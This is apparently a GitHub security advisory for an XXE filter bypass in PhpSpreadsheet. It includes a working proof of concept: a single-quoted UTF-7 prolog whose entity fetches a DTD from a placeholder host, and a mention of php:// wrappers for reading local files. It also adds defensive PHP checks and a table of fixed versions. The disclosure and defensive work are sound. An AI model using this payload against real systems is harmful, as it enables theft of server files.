First published: Wed Aug 28 2024 (Updated: )
### Summary

Bypassing the filter allows an XXE attack, which in turn allows an attacker to obtain the contents of local files, even if error reporting is muted with the `@` symbol (LFI attack).

### Details

The check `$pattern = '/encoding="(.*?)"/';` is easy to bypass: just use a single-quote symbol `'`. The payload then looks like this:

```
<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>
```

If you add this header to any XML file inside an xlsx-formatted file, such as the `sharedStrings.xml` file, the XXE will execute.

### PoC

1) Create a simple xlsx file.
2) Rename the xlsx to zip.
3) Go into the zip and open the `xl/sharedStrings.xml` file in edit mode.
4) Replace `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>` with

```
<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]>
```

5) Save the `sharedStrings.xml` file and rename the zip back to xlsx.
6) Use minimal PHP code that simply opens this xlsx file:

```
<?php
use PhpOffice\PhpSpreadsheet\IOFactory;

require __DIR__ . '/vendor/autoload.php';

$spreadsheet = IOFactory::load("file.xlsx");
```

7) You will receive the request at your `http://%webhook%/file.dtd`.
8) Don't forget that you can use PHP wrappers in the XXE; some `php://` wrapper payloads allow fetching local files.

### Impact

Read local files

![lfi](https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931)
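A defensive pre-check illustrating why the quote-sensitive pattern fails, as an added example that is not PhpSpreadsheet's own code: it reads the prolog's encoding declaration regardless of quote style, transcodes the part to UTF-8 before looking for DOCTYPE/ENTITY markup (so UTF-7's `+ADw-` spelling of `<` cannot hide it), and rejects the part. The helper names are assumptions, and `%webhook%` is the advisory's own placeholder host.

```php
<?php
// Hypothetical pre-check for XML parts extracted from an xlsx container.
// Not PhpSpreadsheet code; added here to illustrate the hardened check.

/**
 * Declared encoding of the XML prolog, accepting either quote style,
 * or 'UTF-8' when no declaration is present (the XML default).
 */
function declaredXmlEncoding(string $xml): string
{
    // The vulnerable pattern matched only encoding="..."; this one also
    // matches encoding='...' so a single-quoted UTF-7 prolog is not missed.
    if (preg_match('/<\?xml[^>]*\bencoding\s*=\s*(["\'])([^"\']+)\1/i', $xml, $m)) {
        return strtoupper($m[2]);
    }
    return 'UTF-8';
}

/**
 * Throws if the part carries a DOCTYPE or ENTITY declaration. The search runs
 * on the bytes AFTER transcoding to UTF-8, so "+ADw-!DOCTYPE" in UTF-7 becomes
 * a literal "<!DOCTYPE" and is caught. Office parts never need a DOCTYPE.
 */
function rejectDoctype(string $xml): void
{
    $encoding = declaredXmlEncoding($xml);
    if (!in_array($encoding, array_map('strtoupper', mb_list_encodings()), true)) {
        throw new RuntimeException("Unsupported XML encoding: $encoding");
    }
    $utf8 = mb_convert_encoding($xml, 'UTF-8', $encoding);
    if (preg_match('/<!(?:DOCTYPE|ENTITY)\b/i', $utf8)) {
        throw new RuntimeException('XML part contains a DOCTYPE or ENTITY declaration');
    }
}

// Constructed sample: the advisory's single-quoted UTF-7 prolog and payload.
$malicious = "<?xml version=\"1.0\" encoding='UTF-7' standalone=\"yes\"?>\n"
    . '+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]>';

// The original double-quote-only pattern does not even see the declaration...
var_dump(preg_match('/encoding="(.*?)"/', $malicious)); // int(0)
// ...while the hardened check reads UTF-7, transcodes, and refuses the part.
try {
    rejectDoctype($malicious);
} catch (RuntimeException $e) {
    echo $e->getMessage(), PHP_EOL;
}

// A benign part passes and can then be parsed with network access disabled.
$benign = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?><sst count="0"/>';
rejectDoctype($benign);
$dom = new DOMDocument();
$dom->loadXML($benign, LIBXML_NONET);
```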
Credit: security-advisories@github.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| PHPOffice PhpSpreadsheet | <1.29.1 | |
| PHPOffice PhpSpreadsheet | >=2.0.0, <2.2.1 | |
| composer/phpoffice/phpspreadsheet | >=2.0.0, <2.1.1 | 2.1.1 |
| composer/phpoffice/phpspreadsheet | >=2.2.0, <2.2.1 | 2.2.1 |
| composer/phpoffice/phpspreadsheet | <1.29.1 | 1.29.1 |